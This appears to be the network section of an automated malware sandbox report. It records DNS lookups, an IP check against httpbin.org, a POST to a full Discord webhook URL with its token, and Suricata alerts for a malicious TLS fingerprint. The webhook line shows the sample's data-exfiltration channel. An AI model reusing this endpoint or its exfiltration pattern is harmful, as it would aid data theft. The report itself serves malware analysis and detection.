Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| httpbin.org | 3.209.149.47 | |
| discord.com | 162.159.135.232 |
- UDP Requests
-
-
192.168.56.102:52062 164.124.101.2:53
-
192.168.56.102:52336 164.124.101.2:53
-
192.168.56.102:64034 164.124.101.2:53
-
192.168.56.102:64995 164.124.101.2:53
-
192.168.56.102:137 192.168.56.255:137
-
192.168.56.102:138 192.168.56.255:138
-
192.168.56.102:49152 239.255.255.250:3702
-
192.168.56.102:49164 239.255.255.250:1900
-
52.231.114.183:123 192.168.56.102:123
-
GET
200
https://httpbin.org/ip
REQUEST
RESPONSE
BODY
GET /ip HTTP/1.1
Host: httpbin.org
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 10 Sep 2021 00:15:44 GMT
Content-Type: application/json
Content-Length: 34
Connection: keep-alive
Server: gunicorn/19.9.0
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
POST
100
https://discord.com/api/webhooks/879386891068256349/bvEK4gAVFnRBb9sg3YV7yiiYRziQj7jLUdVKqAImI0PeKJ90iPJWMn4wivvwSYJ0o9WN
REQUEST
RESPONSE
BODY
POST /api/webhooks/879386891068256349/bvEK4gAVFnRBb9sg3YV7yiiYRziQj7jLUdVKqAImI0PeKJ90iPJWMn4wivvwSYJ0o9WN HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: discord.com
Content-Length: 442
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 192.168.56.102:49170 -> 3.209.207.48:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
| TCP 192.168.56.102:49171 -> 162.159.128.233:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
| Flow | Issuer | Subject | Fingerprint |
|---|---|---|---|
|
TLSv1 192.168.56.102:49170 3.209.207.48:443 |
C=US, O=Amazon, OU=Server CA 1B, CN=Amazon | CN=httpbin.org | ca:ff:2f:cd:9d:a3:00:6c:86:17:a0:4c:8b:fb:93:4d:75:78:50:76 |
|
TLSv1 192.168.56.102:49171 162.159.128.233:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | af:ff:1b:9d:0f:f5:f2:ad:ef:c8:c3:f5:45:0f:7f:e8:20:a0:79:0a |
Snort Alerts
No Snort Alerts